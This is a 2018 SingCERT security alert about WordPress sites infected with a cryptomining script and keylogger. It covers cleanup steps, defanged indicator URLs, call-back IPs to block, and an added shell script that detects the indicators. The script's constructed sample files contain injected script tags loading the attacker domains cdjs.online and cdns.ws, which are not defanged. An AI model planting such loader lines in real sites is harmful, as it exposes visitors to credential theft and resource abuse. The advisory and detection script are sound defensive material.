[SingCERT] Alert on WordPress Websites Infected with Browser-based Digital Currency Mining and Keylogger Malware

Published on Wednesday, 31 January 2018 18:16

Background


On 29 January 2018, security researchers from Sucuri discovered a malicious campaign that targets WordPress websites by injecting them with a browser-based digital currency mining script and a keylogger. A browser-based mining script runs inside the browser of every visitor to the compromised site and consumes the computational power of the visitor's Central Processing Unit (CPU) and Graphics Processing Unit (GPU) for as long as the page stays open. A keylogger is surveillance software that monitors and records each keystroke typed on a computer's keyboard; in this campaign it is a script that records what visitors type into the infected site's pages. Cyber criminals commonly use keyloggers to capture users' information such as login passwords or banking credentials.


Affected Software


WordPress websites running outdated WordPress core versions, older themes or older plugins are at risk of being infected.


Impact


Users will experience a significant decrease in computing performance while visiting compromised websites. The mining script running in the background could consume 60 percent or more of the CPU's resources for as long as the page is open. The keylogger could capture sensitive information such as login credentials and credit card numbers entered on the compromised site.


Recommendations


End Users


SingCERT recommends that end users install anti-adware or script-blocking web browser extensions and antivirus tools on their computers. For more specific recommendations, please refer to our advisory on Browser-based Digital Currency Mining:
https://www.csa.gov.sg/singcert/news/advisories-alerts/alert-on-browser-based-digital-currency-mining


Mobile users are also susceptible to being keylogged and to having their devices used by the mining script if they access an infected WordPress website. Rapid battery drain or sudden overheating of a mobile device while a page is open is a sign that a mining script is running; users should close the tab immediately, which terminates the script.


System Administrators


System administrators can follow the instructions below:

1. Identify and remove the malicious scripts from the WordPress website:

  • Remove the malicious scripts injected into the WordPress database or the theme's files
    • Scan the database table named "wp_posts" for possible infections using a malware scanner for WordPress such as Sucuri Security or Wordfence Security
    • Search for and remove the malicious code from the theme's functions.php file
  • Examples of identified malicious script URLs include:
    • hxxps://cdjs.online/lib.js
    • hxxps://cdjs.online/lib.js?ver=…
    • hxxps://cdns.ws/lib/googleanalytics.js?ver=…
    • hxxps://msdns.online/lib/mnngldr.js?ver=…
    • hxxps://msdns.online/lib/klldr.js

* https has been written as hxxps so that the malicious links are not clickable


2. Pre-emptively block the following malicious call-back IP addresses:
  • 185.209.23.219
  • 185.14.28.10
  • 107.181.161.159

3. Change the passwords of all WordPress user accounts, starting with administrator accounts, after the site has been cleaned: any password entered while the keylogger was active may have been captured, and passwords changed before the cleanup would be captured again

4. Update all server software, including WordPress core and third-party themes and plugins, to the latest version
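The following shell script is an added example illustrating steps 1 and 2 above; it is not SingCERT's or Sucuri's code. It searches a WordPress theme tree and a mysqldump export of wp_posts for the indicator domains listed above, prints the equivalent query to run against a live database, and emits iptables rules for the three call-back IP addresses. The sample theme files and wp_posts dump it creates are constructed for the demonstration; the injected functions.php line and post content are illustrative and not a reproduction of the real injection.

```shell
#!/bin/sh
# Added example, not SingCERT or Sucuri code: locate the injected loaders from
# the indicator list above in theme files and in a wp_posts export, and emit
# the firewall rules for the call-back IPs. Sample files below are constructed.
set -u

# Indicator domains from the advisory, as a pattern valid for both grep -E and
# MySQL REGEXP ([.] avoids backslash-escape differences between the two).
IOC_DOMAIN_RE='(cdjs[.]online|cdns[.]ws|msdns[.]online)'
IOC_IPS='185.209.23.219 185.14.28.10 107.181.161.159'

# find_ioc_hits PATH...: print file:line:text for each line referencing an
# indicator domain under the given paths (theme/plugin trees, SQL dumps).
find_ioc_hits() {
    grep -rnE "$IOC_DOMAIN_RE" "$@" 2>/dev/null || true
}

# count_ioc_hits PATH...: number of matching lines; 0 means no indicator found.
count_ioc_hits() {
    find_ioc_hits "$@" | wc -l | tr -d ' '
}

# wp_posts_query: the query to run on the live database (mysql client or
# "wp db query") when no dump is at hand; lists the posts that need cleaning.
wp_posts_query() {
    printf "SELECT ID, post_title FROM wp_posts WHERE post_content REGEXP '%s';\n" \
        "$IOC_DOMAIN_RE"
}

# block_rules: iptables rules dropping traffic to and from the call-back
# addresses. Printed for review; apply with: block_rules | sh
block_rules() {
    for ip in $IOC_IPS; do
        printf 'iptables -A OUTPUT -d %s -j DROP\n' "$ip"
        printf 'iptables -A INPUT -s %s -j DROP\n' "$ip"
    done
}

# make_sample_site: constructed WordPress tree plus wp_posts dump with one
# injected functions.php, one injected post and clean files; prints the path.
make_sample_site() {
    site=$(mktemp -d)
    mkdir -p "$site/wp-content/themes/sample-theme" "$site/dump"
    cat > "$site/wp-content/themes/sample-theme/functions.php" <<'EOF'
<?php
add_theme_support('title-tag');
// constructed injection (illustrative): loader for the keylogger/miner script
function sample_inject() { echo "<script src='https://cdjs.online/lib.js'></script>"; }
add_action('wp_footer', 'sample_inject');
EOF
    cat > "$site/wp-content/themes/sample-theme/style.css" <<'EOF'
/* Theme Name: Sample Theme (clean file, no indicator) */
EOF
    cat > "$site/dump/wp_posts.sql" <<'EOF'
INSERT INTO `wp_posts` VALUES (1,'Hello world','<p>Welcome.</p>');
INSERT INTO `wp_posts` VALUES (2,'Pricing','<p>Plans</p><script src=\'https://cdns.ws/lib/googleanalytics.js\'></script>');
EOF
    printf '%s\n' "$site"
}

# Demonstration run over the constructed site.
SITE=$(make_sample_site)
echo "Indicator hits:"
find_ioc_hits "$SITE"
echo "Total: $(count_ioc_hits "$SITE")"
echo "Query for a live database:"
wp_posts_query
echo "Firewall rules:"
block_rules
rm -rf "$SITE"
```

On a real server, run find_ioc_hits against wp-content and against a fresh mysqldump of the database rather than the constructed tree, and treat every hit as a file or post to clean by hand; a scanner plugin such as those named in step 1 will also catch obfuscated variants that a plain domain grep misses.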


References


https://thehackernews.com/2018/01/wordpress-keylogger.html


https://blog.sucuri.net/2018/01/cloudflare-solutions-keylogger-returns-on-new-domains.html